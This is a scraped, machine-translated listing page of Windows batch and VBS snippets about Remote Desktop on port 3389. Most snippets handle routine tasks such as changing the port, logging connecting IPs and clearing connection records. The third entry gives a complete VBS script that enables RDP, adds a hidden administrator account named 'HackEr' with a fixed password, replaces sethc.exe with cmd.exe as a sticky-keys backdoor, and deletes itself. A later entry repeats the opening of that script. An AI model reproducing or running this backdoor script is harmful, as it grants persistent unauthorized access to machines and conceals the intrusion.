• Log in the server remote terminal 3389 with batch processing


    It is useful if the server has multiple users or to see if there are other illegal users logged in.In the D disk directory, create two files “ts2003. Bat” (the script file that the user runs when logging in) and “ts2003. Log” (log file).Write “ts2003. Bat” script file: Copy codeThe code is as follows:   time […]

  • Vbs script for changing 3389 remote desktop port


    Set WshShell=CreateObject(“Wscript.Shell”) Function Imput() Import port = InputBox (“please input a port number. Note: this port number cannot be used by other programs at present, otherwise the terminal service will be affected”, “change terminal port number”, “3389“, 100, 100)If imputport<>”” Then If IsNumeric(imputport) Then WshShell.RegWrite “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber”,imputport,”REG_DWORD” WshShell.RegWrite “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber”,imputport,”REG_DWORD” wscript.echo “Operation successful”Else  wscript.echo “Input error, please re-enter”Imput() End If Else  wscript.echo “Operation cancelled”End If End Function Imput() […]

  • XP, 2003 open 3389 + non net create management user + Shift backdoor + self delete script vbs


    Copy codeThe code is as follows: on error resume next  const HKEY_LOCAL_MACHINE = &H80000002  strComputer = “.”  Set StdOut = WScript.StdOut  Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_   strComputer & “\root\default:StdRegProv”)  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”  strValueName = “fDenyTSConnections”  dwValue = 0  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”  strValueName = “PortNumber”  dwValue = 3389  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”  strValueName = “PortNumber”  dwValue = 3389  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  on error resume next  dim username,password:If Wscript.Arguments.Count  Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath  On Error Resume Next  Dim obj, success  Set obj = CreateObject(“WScript.Shell”)  success = obj.run(“cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy; %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy; %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe”, 0, True)  CreateObject(“Scripting.FileSystemObject”).DeleteFile(WScript.ScriptName)

  • Code of modifying 3389 port of remote desktop and adding it to Windows Firewall with vbs


    Save the following code as. VBS, double-click to run. Then restart the system and change the default port 3389 of the remote desktop of the system ‘##################### ‘VBS modifies the default port of the remote desktop and adds it to the windows firewall‘author 51 windows.Net‘56868 is the port to set‘##################### Set WshShell = WScript.CreateObject(“WScript.Shell”) WshShell.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber”,56868,”REG_DWORD” WshShell.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber”,56868,”REG_DWORD” Function Addfirewall(name,port,state)  Set objFirewall = CreateObject(“HNetCfg.FwMgr”) […]

  • Record the batch bat of 3389 remote desktop IP every time


    Copy the following code and save it as a batch file. Double click it! Copy codeThe code is as follows: MD C:\WINDOWS\PDPLOG echo date /t ^>^>RDPlog.txt >>C:\WINDOWS\PDPLOG\PdPLOG.CMD echo time /t ^>^>RDPlog.txt >>C:\WINDOWS\PDPLOG\PdPLOG.CMD echo netstat -n -p tcp ^| find “:3389“^>^>RDPlog.txt >>C:\WINDOWS\PDPLOG\PdPLOG.CMD echo start Explorer >>C:\WINDOWS\PDPLOG\PdPLOG.CMD :: add the IP used by the user to automatically […]

  • Batch processing for clearing 3389 remote desktop connection records


    Copy codeThe code is as follows: @echo off @reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f @del “%USERPROFILE%\My Documents\Default.rdp” /a @exit /VA delete all key values below /F do not prompt /A delete hidden files Save as batch. Just run.

  • VBS that can open 3389 to create user sticky key back door


    on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = “.” Set StdOut = WScript.StdOut Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_ strComputer & “\root\default:StdRegProv”) strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” strValueName = “fDenyTSConnections” dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” strValueName = […]

  • When an IP is connected to port 3389 of my machine, the alarm script


    I know that I can only access a certain IP with IPSec. I can use netstat-an to see that an IP is accessing port 3389 of my machine. I want to monitor the access of an IP and then alarm or input > *. TXT… Can’t you only allow single IP connection in the firewall?Scripts […]

  • Modify Bat Batch Processing Code for Windows Server 2008 R2 3389 Remote Port


    The function is to repair win2008 R2 server remote port 6637 by batch processing and add it to the firewall. @ ECHO OFF color 0A ECHO —————————————————————————- ECHO. ECHO Copyright of Glacier Network ECHO. ECHO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ECHO. echo REGEDIT4 >c:\windows\reg.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Tenninal Server] >> c:\windows\reg.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Tenninal Server\WinStations] >> c:\windows\reg.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Tenninal Server\WinStations\RDP-Tcp] >> c:\windows\reg.reg […]